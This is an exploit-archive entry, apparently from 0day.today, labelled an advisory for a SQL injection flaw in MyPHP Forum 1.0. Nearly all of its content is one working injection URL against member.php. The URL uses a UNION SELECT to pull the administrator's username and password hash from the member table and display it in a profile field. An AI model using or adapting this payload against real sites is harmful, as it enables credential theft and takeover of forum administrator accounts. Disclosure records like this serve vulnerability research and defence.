id: 65
date: 02/10/2005
title: MyPHP Forum 1.0 SQL Injection Exploit
author: GHC
cves: 

=====================================
MyPHP Forum 1.0 SQL Injection Exploit
=====================================



/*==========================================*/
// GHC -> MyPHP Forum <- ADVISORY
// Product: MyPHP Forum
// Version: 1.0
// URL: http://www.myphp.ws
// VULNERABILITY CLASS: SQL injection
/*==========================================*/

[example of exploit]
member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1

/* will show administrator's name and password hash (in the "Yahoo" field). */



#  0day.today [2023-03-25]  #